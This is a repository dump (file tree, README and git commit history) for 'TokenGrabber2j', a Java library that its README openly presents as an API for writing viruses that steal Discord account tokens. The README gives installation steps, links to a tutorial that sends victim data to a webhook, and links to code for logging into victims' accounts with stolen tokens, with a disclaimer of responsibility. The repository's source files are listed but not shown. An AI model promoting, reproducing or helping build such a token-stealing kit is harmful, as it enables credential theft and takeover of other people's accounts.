======================: FILES :======================
TokenGrabber2j
├── LICENSE
├── README.md
├── src
│   └── me
│       └── Phoenix852
│           └── TokenGrabber2j
│               ├── Grabber.java
│               └── Utils
│                   ├── User.java
│                   └── Webhook.java
└── TokenGrabber2j.iml

5 directories, 6 files
======================: README CONTENT :======================
# TokenGrabber2j
A simple to use API for writing java viruses to get discord account token of an user.
# LISTEN
**I take no responsibility how you use this java library. If you get banned, you can't blame me later.**
# Installation
You will need to download the latest library jar from the [releases page](https://github.com/m-Phoenix852/TokenGrabber2j/releases) and add it to your project external libraries.  
After that you need to write a simple virus using it. A simple tutorial of the API that sends the information of the user to a webhook can be found [here](https://hastebin.com/ozomoqomes.java).
# Logging in using token
If you want to login to the victim's account using the token, you can use this [javascript code](https://gist.github.com/m-Phoenix852/b47fffb0fd579bc210420cedbda30b61). BUT once again read [this](https://github.com/m-Phoenix852/TokenGrabber2j/#listen)

# LISTEN AGAIN
Don't blame me for lack of documentations, I am lazy to write the documentations but when I do I will announce.
====================== GIT HISTORY: ======================
c73d2cd HEAD@{0}: clone: from https://github.com/m-Phoenix852/TokenGrabber2j
commit c73d2cd33d631b667122cf0e7365ef2bc6487ff7
Author: Phoenix852 <dasmon852@gmail.com>
Date:   Wed Aug 26 01:00:05 2020 -0700

    Update README.md

commit 310142416f564b9827b57134d2da6ff1ed06ee25
Author: Phoenix852 <dasmon852@gmail.com>
Date:   Wed Aug 26 00:56:24 2020 -0700

    Create README.md

commit df493fa86144b4a7d89eaefd729d475a8400cddf
Author: Phoenix852 <dasmon852@gmail.com>
Date:   Wed Aug 26 00:06:59 2020 -0700

    Added files

commit 9f661fc4ef5b55cb0c78ecaa9735741a1efe0891
Author: Phoenix852 <dasmon852@gmail.com>
Date:   Wed Aug 26 00:03:25 2020 -0700

    Initial commit
